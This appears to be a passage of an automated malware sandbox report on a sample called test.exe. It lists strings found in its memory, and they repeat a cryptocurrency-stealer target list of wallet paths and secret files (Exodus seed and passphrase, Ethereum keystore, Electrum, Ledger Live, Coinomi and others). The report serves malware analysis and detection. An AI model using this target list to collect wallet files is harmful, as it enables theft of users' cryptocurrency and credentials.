Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Jaxx Liberty
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 